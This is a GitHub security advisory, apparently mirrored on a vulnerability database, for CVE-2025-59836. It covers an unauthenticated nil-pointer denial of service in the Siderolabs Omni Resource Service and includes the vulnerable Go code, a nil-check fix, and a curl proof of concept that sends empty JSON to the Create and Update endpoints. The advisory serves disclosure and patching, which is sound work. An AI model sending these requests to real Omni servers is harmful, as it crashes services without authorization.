ghsa-4p3p-cr38-v5xp
Vulnerability from github
Published
2025-10-13 19:59
Modified
2025-10-13 22:09
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Summary
Omni is Vulnerable to DoS via Empty Create/Update Resource Requests
Details

Summary

A nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.

Details

The vulnerability exists in the isSensitiveSpec function which calls grpcomni.CreateResource without checking if the resource's metadata field is nil. When a resource is created with an empty Metadata field, the CreateResource function attempts to access resource.Metadata.Version causing a segmentation fault.

Vulnerable Code

The isSensitiveSpec function in /src/internal/backend/server.go:

go func isSensitiveSpec(resource *resapi.Resource) bool { res, err := grpcomni.CreateResource(resource) // No nil check on resource.Metadata if err != nil { return false } // ... rest of function }

The CreateResource function expects resource.Metadata to be non-nil:

go func CreateResource(resource *resources.Resource) (cosiresource.Resource, error) { if resource.Metadata.Version == "" { // PANIC: nil pointer dereference resource.Metadata.Version = "1" } // ... rest of function }

The UpdateResource function has the same issue - it also calls CreateResource internally and expects resource.Metadata to be non-nil:

go func (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) { // ... validation code ... obj, err := CreateResource(in.Resource) // Same vulnerability here if err != nil { return nil, err } // ... rest of function }

Affected Endpoints

  • resourceServerCreate - Create Resource API endpoint
  • resourceServerUpdate - Update Resource API endpoint

Both endpoints call isSensitiveSpec which triggers the vulnerability when processing empty resources.

PoC

Send empty resource requests to the affected API endpoints:

```bash

Create endpoint

curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Create" \ -H "Content-Type: application/json" \ -d '{}'

Update endpoint

curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Update" \ -H "Content-Type: application/json" \ -d '{}' ```

Expected Result: Server panic with segmentation fault:

``` panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]

goroutine 3305 [running]: github.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?) /src/internal/backend/grpc/resource.go:364 +0x20 ```

Impact

  • Vulnerability Type: Denial of Service (DoS)
  • Severity: High - Complete API server crash requiring manual restart if no restart policy is applied.
  • Authentication: None required (unauthenticated)
  • Complexity: Low (simple HTTP request)

Mitigation

Add nil checks in the isSensitiveSpec function:

go func isSensitiveSpec(resource *resapi.Resource) bool { if resource == nil || resource.Metadata == nil { return false } res, err := grpcomni.CreateResource(resource) if err != nil { return false } // ... rest of function }

Credits

  • @1c3t0rm
  • @nicomda
Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0-beta.0"
            },
            {
              "fixed": "1.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59836"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T19:59:17Z",
    "nvd_published_at": "2025-10-13T21:15:34Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.\n\n## Details\n\nThe vulnerability exists in the `isSensitiveSpec` function which calls `grpcomni.CreateResource` without checking if the resource\u0027s metadata field is nil. When a resource is created with an empty `Metadata` field, the `CreateResource` function attempts to access `resource.Metadata.Version` causing a segmentation fault.\n\n### Vulnerable Code\n\nThe `isSensitiveSpec` function in `/src/internal/backend/server.go`:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\nThe `CreateResource` function expects `resource.Metadata` to be non-nil:\n\n```go\nfunc CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {\n    if resource.Metadata.Version == \"\" {  // PANIC: nil pointer dereference\n        resource.Metadata.Version = \"1\"\n    }\n    // ... rest of function\n}\n```\n\nThe `UpdateResource` function has the same issue - it also calls `CreateResource` internally and expects `resource.Metadata` to be non-nil:\n\n```go\nfunc (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {\n    // ... validation code ...\n    obj, err := CreateResource(in.Resource)  // Same vulnerability here\n    if err != nil {\n        return nil, err\n    }\n    // ... rest of function\n}\n```\n\n### Affected Endpoints\n\n- `resourceServerCreate` - Create Resource API endpoint\n- `resourceServerUpdate` - Update Resource API endpoint\n\nBoth endpoints call `isSensitiveSpec` which triggers the vulnerability when processing empty resources.\n\n## PoC\n\nSend empty resource requests to the affected API endpoints:\n\n```bash\n# Create endpoint\ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Create\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n\n# Update endpoint  \ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Update\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n```\n\n**Expected Result**: Server panic with segmentation fault:\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]\n\ngoroutine 3305 [running]:\ngithub.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)\n        /src/internal/backend/grpc/resource.go:364 +0x20\n```\n\n## Impact\n\n- **Vulnerability Type**: Denial of Service (DoS)\n- **Severity**: High - Complete API server crash requiring manual restart if no restart policy is applied.\n- **Authentication**: None required (unauthenticated)\n- **Complexity**: Low (simple HTTP request)\n\n## Mitigation\n\nAdd nil checks in the `isSensitiveSpec` function:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    if resource == nil || resource.Metadata == nil {\n        return false\n    }\n    res, err := grpcomni.CreateResource(resource)\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\n## Credits\n- @1c3t0rm\n- @nicomda",
  "id": "GHSA-4p3p-cr38-v5xp",
  "modified": "2025-10-13T22:09:25Z",
  "published": "2025-10-13T19:59:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/security/advisories/GHSA-4p3p-cr38-v5xp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1396083f766a1b0380e9949968d7fc17b7afecaa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1fd954af64985a8b3dbf5b11deddbf7cd953f5ae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siderolabs/omni"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Omni is Vulnerable to DoS via Empty Create/Update Resource Requests"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.